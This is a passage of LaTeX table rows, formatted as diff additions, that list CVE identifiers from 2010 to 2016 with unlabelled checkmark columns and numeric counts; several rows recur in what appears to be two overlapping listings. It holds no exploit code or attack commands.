\\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule +CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule +CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule +CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule +CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule +CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule +CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule +CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule +CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule +CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & 